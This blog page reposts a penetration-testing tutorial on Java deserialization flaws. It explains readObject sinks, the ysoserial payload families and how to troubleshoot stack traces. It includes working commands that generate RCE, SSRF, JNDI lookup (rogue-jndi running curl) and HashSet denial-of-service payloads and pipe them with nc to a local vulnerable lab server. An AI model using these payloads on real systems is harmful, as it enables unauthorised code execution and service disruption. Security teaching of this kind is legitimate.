<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Noto Serif SC:300,300italic,400,400italic,700,700italic|Roboto Mono:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zanderchang.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Testing and exploiting Java Deserialization in 2021 (Feb 8, 2021) 作者：Lukasz Mikula">
<meta property="og:type" content="article">
<meta property="og:title" content="2021年JAVA反序列化的测试与利用">
<meta property="og:url" content="http://zanderchang.github.io/2021/04/23/2021%E5%B9%B4JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E6%B5%8B%E8%AF%95%E4%B8%8E%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="zh2的博客">
<meta property="og:description" content="Testing and exploiting Java Deserialization in 2021 (Feb 8, 2021) 作者：Lukasz Mikula">
<meta property="og:locale">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*AjPfb2LyEoy4xVjw.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*qQezrW2iyM4_tlYr.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*MkZfYPc64-o0SIwp.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*fjFKwf9KPXhuFN5J.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*A62YW5TLN4oIxxq0.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*1Ibz-kw5dTY5Capf.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*6f0TYvuxseeLiIfC.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*MAYJOW9nHk2If2lH.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*X2d7_yZdNo-o6N8M.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*H6_WiNoJ1LMZT-Y2.png">
<meta property="og:image" content="https://miro.medium.com/max/1210/0*LpYP_DiNGy05NDl0.png">
<meta property="article:published_time" content="2021-04-23T00:59:33.000Z">
<meta property="article:modified_time" content="2021-04-23T02:54:19.324Z">
<meta property="article:author" content="zh2">
<meta property="article:tag" content="Java">
<meta property="article:tag" content="反序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://miro.medium.com/max/1210/0*AjPfb2LyEoy4xVjw.png">

<link rel="canonical" href="http://zanderchang.github.io/2021/04/23/2021%E5%B9%B4JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E6%B5%8B%E8%AF%95%E4%B8%8E%E5%88%A9%E7%94%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>2021年JAVA反序列化的测试与利用 | zh2的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="zh2的博客" type="application/atom+xml"><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zh2的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://zanderchang.github.io/2021/04/23/2021%E5%B9%B4JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E6%B5%8B%E8%AF%95%E4%B8%8E%E5%88%A9%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="zh2">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zh2的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2021年JAVA反序列化的测试与利用
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-04-23 08:59:33 08:59:33" itemprop="dateCreated datePublished" datetime="2021-04-23T08:59:33+08:00">2021-04-23 08:59:33</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-04-23 10:54:19 10:54:19" itemprop="dateModified" datetime="2021-04-23T10:54:19+08:00">2021-04-23 10:54:19</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Java/" itemprop="url" rel="index"><span itemprop="name">Java</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Java/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" itemprop="url" rel="index"><span itemprop="name">反序列化</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><em>Testing and exploiting Java Deserialization in 2021 (Feb 8, 2021)</em></p>
<p>作者：Lukasz Mikula</p>
<span id="more"></span>
<p>Since 2015 when java deserialization was a major threat, lots of patches and improvements has been introduced. How to approach testing for java serialization to achieve best results? How do you use ysoserial properly? Learn it from the below article.</p>
<p>The article is based on talks I gave recently on Polish conferences — <a target="_blank" rel="noopener" href="https://omhconf.pl/">OhMyHack</a>, <a target="_blank" rel="noopener" href="https://thehacksummit.com/">The Hack Summit</a> and also <a target="_blank" rel="noopener" href="https://owasp.org/www-chapter-poland/">OWASP Poland online meetup</a>.</p>
<p>There was not any new technique discovered, but I rather made a summary of current “state of art”. Moreover, I performed some reading of Ysoserial’s source code to see how each payload is meant to work, which also resulted in creating kind of guide to using Ysoserial. You can also find some practical tips I share based on my own experience with penetration testing Java applications.</p>
<p>As in 2021 the Java environments become more and more hardened — libraries are being patched, JEP 290 and similar patches are introduced, no new gadgets are being published, it is worth to summarize current boundaries of serialization exploitation. Is java deserialization still a threat? Or the patches completely killed it?</p>
<p>As the article is pretty long, I’ll start it with a TLDR, so you can look for anything that interests you within the post. Also, I’ve added some external references to interesting content on the subject of Java Deserialization.</p>
<h1 id="TLDR"><a href="#TLDR" class="headerlink" title="TLDR"></a>TLDR</h1><p>· During whitebox analysis look for readObject() which is potential sink for deserialization vunlerabilities. Also, you might want to test the <a target="_blank" rel="noopener" href="https://github.com/0xluk3/Java-Deserialization-Basics/blob/main/Vulnerable.java">exemplary vulnerable TCP server</a>. Don’t forget to add required dependencies to its classpath. For testing Ysoserial payloads, you might add the ysoserial.jar itself as a dependency, as described in README.</p>
<p>· Use <a target="_blank" rel="noopener" href="https://twitter.com/NickstaDB">Nicky Bloor’s</a> <a target="_blank" rel="noopener" href="https://github.com/NickstaDB/SerializationDumper">Serialization dumper</a> to inspect serialized objects to confirm what they are. Apart from deserialization flaws to be exploited with Ysoserial, it is possible that a logical information is being transported in the serialized stream (e.g. user=admin)</p>
<p>· Ysoserial has more usages than just getting instant RCE. For blind testing, use URLDNS or JRMPClient/Listener payloads. Apart from instant RCE, it’s worth noticing how to use payloads related to FileUpload or Object Lookup.</p>
<p>· Be prepared to face stack traces — they don’t always mean that you failed. See what to do, If you find errors like SerialUID Mismatch or ClassNotFoundException at the end of this article.</p>
<h1 id="反序列化概述"><a href="#反序列化概述" class="headerlink" title="反序列化概述"></a>反序列化概述</h1><p>Serialization (and a reverse process — deserialization) is simply a feature of Java (and many other languages) which allow objects to be converted to a special, binary form, in which they can be transported and stored. Later, they can be recreated (deserialized) in original form any another Java Virtual Machine (so the Java Environment is involved into serializing and deserializing data), regardless it’s just another process or completely different physical machine.</p>
<p>If you don’t understand the very basics of Java Serialization, I’d recommend reading some of these articles first:</p>
<p><a target="_blank" rel="noopener" href="https://www.baeldung.com/java-serialization">https://www.baeldung.com/java-serialization</a></p>
<p><a target="_blank" rel="noopener" href="https://dzone.com/articles/what-is-serialization-everything-about-java-serial">https://dzone.com/articles/what-is-serialization-everything-about-java-serial</a></p>
<p>Why is even Java Serialization interesting for security researchers? Basically, it’s nothing new that untrusted deserialization can lead to remote code execution. There’s a <a target="_blank" rel="noopener" href="https://frohoff.github.io/appseccali-marshalling-pickles/">well known presentation named Marshalling Pickles</a> that led to Java Deserialization Apocalypse in 2015/2016 together with <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial">tool Ysoserial</a> which was released shortly afterwards. It allows for automatic exploitation of Java deserialization vulnerabilities. Ysoserial will be covered in-depth in this article later on.</p>
<p>Serialization regards java objects. Java is an <a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Object-oriented_programming">object-oriented programming language (OOP)</a>, so you can expect that almost everything in Java is an object. Usually, we will refer to an object as to instance of a <a target="_blank" rel="noopener" href="https://www.w3schools.com/java/java_classes.asp">java class</a>.</p>
<p>Note, that a class instance can in the same time contains multiple <a target="_blank" rel="noopener" href="http://tutorials.jenkov.com/java/fields.html">fields</a>, and each of these fields might be an instance of another class. So the serialized object is a pack of java “prefabricates”, which are added some description about how to bring them back to original state.</p>
<p>At deserializing end (another application / process / machine / whatever calls deserialization function on the object) this object is recreated (deserialized).</p>
<p>The deserializing end basically have no idea what the object should look like after recreating. And basically this is what deserialization vulnerability is all about — when there’s no check what should arrive to the deserializing end, why shouldn’t we send something unexpected?</p>
<h1 id="反序列化漏洞成因"><a href="#反序列化漏洞成因" class="headerlink" title="反序列化漏洞成因"></a>反序列化漏洞成因</h1><p>In order to re-create an object from its deserialized state, Java provides special function (<a target="_blank" rel="noopener" href="https://docs.oracle.com/en/java/javase/12/docs/api/java.base/java/io/ObjectInputStream.html">or rather a set of functions</a>), which has to be used on a deserialized object in order to be able to deserialize it which means, create an instance of that object on deserializing end. We’ll consider just <code>ObjectInputStream.readObject()</code> not to dive to deeply, but just keep in mind that this is not the only deserialization sink existing.</p>
<p><code>readObject()</code> alone is just responsible for creating (instantiating) the serialized object and not for checking what kind of object it is. Thus, if nobody takes extra care of security, then any object can be deserialized.</p>
<p>As said previously, serialized object can be a nested pack of other objects. What deserialization exploits are using, is nested objects which are manipulated in a way, that they are behave like a method which is executed upon instantiating an object. Such effect is possible when a legitimate serialized object is manipulated e.g. on a binary level or using <a target="_blank" rel="noopener" href="https://www.baeldung.com/java-set-private-field-value">Java Reflection API</a>. As an effect, the object upon being serialized behaves like a jack in the box.</p>
<p>The process is described in details in Java documentation:</p>
<p><em>Reading an object is analogous(类似) to running the constructors of a new object. Memory is allocated for the object and initialized to zero (NULL). No-arg constructors are invoked for the non-serializable classes and then the fields of the serializable classes are restored from the stream starting with the serializable class closest to java.lang.object and finishing with the object’s most specific class.</em></p>
<p>If you are interested in more functions that deserialize objects check Java Docs:</p>
<p><a target="_blank" rel="noopener" href="https://docs.oracle.com/en/java/javase/12/docs/api/java.base/java/io/ObjectInputStream.html">https://docs.oracle.com/en/java/javase/12/docs/api/java.base/java/io/ObjectInputStream.html</a></p>
<p>When inspecting an application in a white-box approach, look for <code>readObject()</code> functions. They are potential sinks of deserialization vulnerability (of course, if you are able to deliver user-controlled data to them). Often software vendors build own wrappers for readObject, e.g. consider a function <code>vendorDeserialize()</code> being present in source code but using <code>ois.readObject()</code> under the hood.</p>
<p>As already said, the <code>readObject()</code> call alone is sufficient to introduce the vulnerability to a piece of software. For sake of testing deserialization issues, here’s a simple TCP Server that was already mentioned before, that just deserializes anything that is sent to its listening port. See the <a target="_blank" rel="noopener" href="https://github.com/0xluk3/Java-Deserialization-Basics/blob/main/README.md">Github repo</a> for instructions how to play with it.</p>
<p>If you want to run this example on your own, download and build it from Github linked above.</p>
<p>As you can see, after <code>readObject()</code>, the object has just been instantiated, which was sufficient to perform exploitation on the server. Even if someone calls a serie of checks after the object is “read”, it’s already too late.</p>
<h1 id="理解反序列化协议"><a href="#理解反序列化协议" class="headerlink" title="理解反序列化协议"></a>理解反序列化协议</h1><p>In order to be able to serialize and then de-serialize an object, some conditions have to be met:</p>
<ul>
<li><p>An object to be serialized has to implement Serializable interaface (so JVM treats it differently under the hood allowing for packing it if needed)</p>
</li>
<li><p>All the classes to be deserialized have to be present on deserializing classpath. Serialization concerns state of an object, but the definition has to be already present on the deserializing side.</p>
</li>
</ul>
<p>If you were able to perform static analysis on an application, then you can confirm existence of deserialization sinks via presence of <code>readObject()</code>. But in order to be able to test deserialization vulnerability, you have also to find a way to deliver the serialized data to that sink. Usually, easiest way to spot serialization being in use is to inspect application traffic.</p>
<p>Java serialized objects have a specific signature which easily allow to identify them, which is binary <code>0xaced0005</code>. It translates to base64 <code>rO0AB</code>. Note, that a serialized java object might be wrapped into any kind of encryption or encoding, thus when dealing with Java application it is worth to dig deeply into any encoded data being sent. That involves e.g. TCP traffic, or HTTP channels like POST parameters, Cookies and Headers.</p>
<p>If there’s any data you suspect of being a serialized Java object, you can use tool named <a target="_blank" rel="noopener" href="https://github.com/NickstaDB/SerializationDumper">Serialization Dumper</a> tool to inspect it</p>
<p><img src="https://miro.medium.com/max/1210/0*AjPfb2LyEoy4xVjw.png" alt=""></p>
<p>One of the fields is <code>SerialUID</code> which is an unique class version identifier. This is something that might cause your payloads to fail, and it’s described later on in “troubleshooting” section along with another issues.</p>
<h1 id="Ysoserial"><a href="#Ysoserial" class="headerlink" title="Ysoserial"></a>Ysoserial</h1><p>As mentioned earlier, Ysoserial is a tool for exploiting java deserialization vunlerabilities. It consists of modules named payloads. Each payload generates a serialized object which once instantiated, invokes some kind of action.</p>
<p>A serialized object might be made from classes, which have some fields (which are also classes) already set up and tweaked using java reflection or binary manipulation. This is exactly what ysoserial does. These prefabricated objects, which in turn create a bigger object that invokes some kind of operation upon instantation are called <em>gadgets</em>.</p>
<p>The classes that have some specific features making them usable as gadgets are rarely native java classes. They are often more sophisticated objects, which are parts of some commonly used libraries (so they are likely to be present on most classpaths, which in turn is a good choice to using them to craft serialized objects targeting deserialization vulns). These libraries are called gadget libraries.</p>
<p>So Ysoserial, apart from payloads, makes use of gadget libraries to generate serialized objects, which upon instantiation results in invoking some action. Now, I’ll shortly explain which payloads create which action.</p>
<p>What I’ve saw recently on various internet blog posts is suggestion to use Ysoserial in a “for” loop, iterating over payloads. This is not how you use this tool and you are losing some of its potential doing that.</p>
<p>Basically, if you look at source code in <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/tree/master/src/main/java/ysoserial/payloads">ysoserial’s payloads</a>, you will find comments indicating proper usage of each payload module. I’ve posted a short summary of it below. Note, that existence of serialized objects in communication does not mean that application is vulnerable. This can be as well properly designed serialization (which checks type of data before instantiating anything) or a patched application. Proper testing approach should allow you to tell it — is it deserializing anything, but no gadgets are available, or is it a securely designed application.</p>
<h2 id="FileUpload-Wicket"><a href="#FileUpload-Wicket" class="headerlink" title="FileUpload, Wicket"></a>FileUpload, Wicket</h2><p>These are similar to each other. Serialized object relies on <code>DiskFileItem</code> class, which results in creating a file on remote OS. If you look at <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/FileUpload1.java">source code of e.g. FileUpload1</a>, you’ll find the usage code’s comments. If remote classpath contains FileUpload / Wicket dependencies and is vulnerable to insecure deserialization, you can use following command to generate ysoserial’s payload:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar FileUpload1 <span class="string">&quot;write;/tmp;CONTENTSOFTHEFILE&quot;</span></span><br></pre></td></tr></table></figure>
<p>This will make the remote JVM to save a randomly named file with content CONTENTSOFTHEFILE in /tmp directory.</p>
<h2 id="RMI相关"><a href="#RMI相关" class="headerlink" title="RMI相关"></a>RMI相关</h2><p>There are two ysoserial payloads dedicated to exploitation of RMI Registries. However, after <a target="_blank" rel="noopener" href="https://mogwailabs.de/en/blog/2019/03/attacking-java-rmi-services-after-jep-290/">JEP290 remote exploitation of RMI Registries is a lot more difficult</a>.</p>
<p>These payloads were designed to be used together — <code>JRMPListener</code> opens a dummy RMI Registry and <code>JRMPClient</code> allowed for remote exploitation of it if the target JRE is not patched with JEP290.</p>
<p>Also, <code>JRMPListener</code> can be used to host a payload on a rogue RMI Registry to be deserialized, and <code>JRMPClient</code> can be used against the target to connect back to attacker’s registry and deserialize the payload. This is used in e.g. Weblogic CVE-2018–2628 <a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/44553">https://www.exploit-db.com/exploits/44553</a>. The listener can be opened using command</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp ysoserial.exploit.JRMPListener &lt;port&gt; &lt;payload_type&gt; &lt;payload_arguments&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://miro.medium.com/max/1210/0*qQezrW2iyM4_tlYr.png" alt=""></p>
<p>Even if you won’t get RCE this way, those two payloads can be used for blind detection of insecure deserialization — since they rely on native Java classes. When used as a standalone payloads, <code>JRMPClient</code> will make the deserializing end perform a kind of TCP SSRF trying to connect to RMI Registry (which is a proof that the payload was deserialized), and using <code>JRMPListener</code>, you can make the deserializing endpoint open a dummy RMI Registry (without any binding).</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar JRMPClient 127.0.0.1:80</span><br></pre></td></tr></table></figure>
<p><img src="https://miro.medium.com/max/1210/0*MkZfYPc64-o0SIwp.png" alt=""></p>
<p>This results in performing a request to the Listener. However, the directory is not created even if the classpath on vulnerable side is complete, which is due to Java being patched.</p>
<p><img src="https://miro.medium.com/max/1210/0*fjFKwf9KPXhuFN5J.png" alt=""></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar JRMPListener 1199</span><br></pre></td></tr></table></figure>
<p>This one makes the deserializing end open an empty RMI registry</p>
<p><img src="https://miro.medium.com/max/1210/0*A62YW5TLN4oIxxq0.png" alt=""></p>
<p><img src="https://miro.medium.com/max/1210/0*1Ibz-kw5dTY5Capf.png" alt=""></p>
<h2 id="Object-Lookup-JNDI"><a href="#Object-Lookup-JNDI" class="headerlink" title="Object Lookup (JNDI)"></a>Object Lookup (JNDI)</h2><p>Object Lookup is a Java feature related to <a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface">Java Naming and Directory Interface</a>. In short, it allows for retrieving (“<a target="_blank" rel="noopener" href="https://docs.oracle.com/en/java/javase/12/docs/api/java.naming/javax/naming/Context.html">looking up</a>“) remote Objects from various sources. These sources can be LDAP directories, RMI Servers or HTTP Servers. Usually, this feature is abused against vulnerability class JNDI Injection, <a target="_blank" rel="noopener" href="https://www.veracode.com/blog/research/exploiting-jndi-injections-java">which you can read more about here</a> and <a target="_blank" rel="noopener" href="https://github.com/welk1n/JNDI-Injection-Bypass">here</a>.</p>
<p>Payloads that rely on this attack vector needs you to host a malicious object on your side, and the deserializing end will perform a lookup of the malicious object, which means, it will download and execute it. Due to hardening of modern Java there are some caveats which won’t be discussed here due to being too extensive. In short, in the past you were able just to host a compiled Java class to be executed. Now it has to meet some more requirements, which are described in aforementioned article about JNDI Injections.</p>
<p>During experiments, I was not able to get to work <code>Hibernate2</code> and <code>Myfaces2</code>, however I was able to get <code>C3P0</code> working while hosting the malicious Object using <a target="_blank" rel="noopener" href="https://github.com/artsploit/rogue-jndi">Artsploit — Rogue JNDI</a>.</p>
<p>To use this payload, first we run a netcat listener and a vulnerable TCP server.</p>
<p>This payload (if <code>C3P0</code> gadgets are present on classpath) can be used to craft both a SSRF and an RCE. For simple SSRF (Lookup attempt) use</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar C3P0 <span class="string">&quot;http://127.0.0.1:9999/:SSRF&quot;</span> | nc -v 127.0.0.1 12345</span><br></pre></td></tr></table></figure>
<p><img src="https://miro.medium.com/max/1210/0*6f0TYvuxseeLiIfC.png" alt=""></p>
<p>For RCE, we’ll need to set up rogue-jndi and point the ysoserial payload to it.</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar C3P0 <span class="string">&quot;http://127.0.0.1:8000/:xExportObject&quot;</span> | nc -v 127.0.0.1 12345</span><br></pre></td></tr></table></figure>
<p><img src="https://miro.medium.com/max/1210/0*MAYJOW9nHk2If2lH.png" alt=""></p>
<p>While on port 8000 there’s rogue-jndi listening</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar RogueJndi-1.1.jar -c <span class="string">&quot;curl http://127.0.0.1:9999/rce&quot;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://miro.medium.com/max/1210/0*X2d7_yZdNo-o6N8M.png" alt=""></p>
<p>Which results in executing the malicious object</p>
<p><img src="https://miro.medium.com/max/1210/0*H6_WiNoJ1LMZT-Y2.png" alt=""></p>
<h2 id="URLDNS"><a href="#URLDNS" class="headerlink" title="URLDNS"></a>URLDNS</h2><p>A very powerful payload in terms of blind testing. DNS Lookup is a feature of Java when handling serialized URL object <a target="_blank" rel="noopener" href="https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/">crafted in a specific way</a>. It’s powerful because that payload also does not require any additional libraries to work. Use it as</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar URLDNS <span class="string">&quot;http://12345.burpcollaborator.net&quot;</span></span><br></pre></td></tr></table></figure>
<p>This results in an DNS lookup. While it’s not much of an Impact, it’s a good way to confirm that insecure deserialization exist.</p>
<p>If you do not have Burp Pro, you can use <a target="_blank" rel="noopener" href="https://github.com/iphelix/dnschef">DNSChef</a> to receive the DNS interaction. Note, that this payload is also designed just to detect arbitrary serialization, the DNS resolution does not add any significant impact (the most significant I can think of is revealing an internal host IP)</p>
<h2 id="Jython-Myfaces"><a href="#Jython-Myfaces" class="headerlink" title="Jython, Myfaces"></a>Jython, Myfaces</h2><p>I was not able to get them working during my tests. However, <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Jython1.java">Jython payload</a> is supposed to work in a similar manner as FileUpload, with a difference — it also runs the uploaded script.</p>
<p><a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Myfaces1.java">Myfaces1</a> — It should rely on executing EL expression, however during experiments I was not able to get it working too.</p>
<h2 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h2><p>All other payloads, listed below, are designed for direct Code Execution. Note, that on modern Java you will have <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/issues/65">trouble running CommonsCollections 1–4 included</a> due to hardening of JDK classes. If you have access to stack traces this can be confirmed if an error “missing element entrySet” is found.</p>
<h2 id="DoS"><a href="#DoS" class="headerlink" title="DoS"></a>DoS</h2><p>Native JDK DoS PoC relies on a recursive HashSet. You can find the original one <a target="_blank" rel="noopener" href="https://gist.github.com/coekie/a27cc406fc9f3dc7a70d">here</a>, I just changed it a bit so it generates a serialized payload instead of deserializing itself instantly. You can download modified version of this <a target="_blank" rel="noopener" href="https://github.com/0xluk3/Java-Deserialization-Basics/blob/main/SerialDOS.java">payload here</a>. The serialized payload, when sent to vulnerable TCP Server, causes resource consumption to spike. We generate the dos payload:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javac SerialDOS.java &amp;&amp; java SerialDOScat dos.ser | nc -v 127.0.0.1 12345</span><br></pre></td></tr></table></figure>
<p><img src="https://miro.medium.com/max/1210/0*LpYP_DiNGy05NDl0.png" alt=""></p>
<h2 id="Other-public-exploits-amp-payloads"><a href="#Other-public-exploits-amp-payloads" class="headerlink" title="Other public exploits &amp; payloads"></a>Other public exploits &amp; payloads</h2><p>interesting Exploits and Ysoserial forks that contain additional payloads</p>
<p>· <a target="_blank" rel="noopener" href="https://github.com/wh1t3p1g/ysoserial">https://github.com/wh1t3p1g/ysoserial</a></p>
<p>· <a target="_blank" rel="noopener" href="https://github.com/federicodotta/ysoserial">https://github.com/federicodotta/ysoserial</a></p>
<p>· <a target="_blank" rel="noopener" href="https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet">https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet</a></p>
<h1 id="常见问题"><a href="#常见问题" class="headerlink" title="常见问题"></a>常见问题</h1><p>There are numerous things that might go wrong when exploiting serialization flaws. For successful serialization and deserialization, there are following requirements:</p>
<ul>
<li><p>Objects to be serialized have to implement Serializable interface</p>
</li>
<li><p>The data has to be serialized and transported — you need a reliable way of payload delivery (e.g. HTTP traffic)</p>
</li>
<li><p>The object has to be deserialized (instantiated) on another end, which requires that:</p>
<ul>
<li><p>Data has to arrive in non-changed form, including proper encoding especially when going through multiple devices / proxies</p>
</li>
<li><p>The remote classpath has to include all classes that are to be deserialized</p>
</li>
<li><p>The SerialVersionUID has to match the value known on deserializing end</p>
</li>
<li><p>There either should not be any process filters (e.g. insecure deserialization with ReadObject) or the data deserialized has to match filter rules</p>
</li>
</ul>
</li>
</ul>
<p>If anything of these requirements is not met, you are probably going to receive a long stack trace. Unless you do not work with Java on a regular manner, you might feel discouraged by the unclear stack traces appearing. Below you can find explanation for popular errors and how to solve them.</p>
<h2 id="ClassNotFound-Exception"><a href="#ClassNotFound-Exception" class="headerlink" title="ClassNotFound Exception"></a>ClassNotFound Exception</h2><p>This means that a class (its name will be listed in the stack trace) is not on the target classpath. This might mean that the target classpath is patched, e.g. even if there are vulnerable libraries on it, they might have the gadget classes cut off. However, if during a penetration test you are able to obtain information on which classes are on the classpath, you can try to enumerate them. A tool named <a target="_blank" rel="noopener" href="https://github.com/BishopFox/GadgetProbe">GadgetProbe</a> might be helpful in that case.</p>
